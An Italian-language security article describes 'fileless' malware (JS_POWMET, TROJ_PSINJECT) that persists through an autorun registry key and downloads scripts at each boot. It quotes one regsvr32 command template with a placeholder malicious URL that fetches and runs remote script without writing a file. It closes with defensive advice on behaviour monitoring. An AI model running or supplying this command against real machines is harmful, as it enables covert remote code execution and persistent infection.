I criminali informatici iniziano a concentrarsi sul fare degli attacchi senza lasciare traccia, dove il malware non ha un file di trasporto come un .pdf, .exe o uno .zip ma viene lanciato sul client tramite una chiave di registro oppure un autorun che punta all’url di un sito malevolo per scaricare uno script, magari powershell, che a sua volta scarica un file contenente il virus vero e proprio.

COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”

Utilizzando una catena di questo tipo, il malware sarà più difficile da analizzare usando una sandbox, rendendo più difficile l’esame degli ingegneri. Con questo metodo, al regsvr32 è stato indicato un URL come parametro, che renderà regsvr32 in grado di recuperare il file (XML con JavaScript dannoso) trovato nell’URL. A causa di questa routine, regsvr32 sarà in grado di eseguire lo script in modo arbitrario senza salvare il file XML sulla macchina. In particolare, ogni volta che viene avviata la macchina interessata, scarica automaticamente il file dannoso dal suo server Command & Control (C&C), che per inciso, potrà anche essere una versione sempre più “cattiva” e con funzioni più precise.

TrendMicro, con uno dei vari laboratori di ricerca virus, ha identificato il secondo caso di malware che utilizza questa tecnica, che si chiama JS_POWMET e TROJ_PSINJECT (TROJ_PSINJECT.A).

Malware “senza file” come questo sono progettati per rendere più difficile il rilevamento da parte delle soluzioni di sicurezza, poiché tali organizzazioni devono implementare soluzioni “multi-layered” che possono aiutare a rilevare le infezioni monitorando i comportamenti tramite allarmi e connessioni sospette. Le soluzioni antivirus quindi devono includere il monitoraggio del comportamento per rilevare questo tipo di malware; Questo aiuta a cercare comportamenti pericolosi che possono bloccare la catena e quindi il malware prima che il codice malevolo “vero” venga eseguito.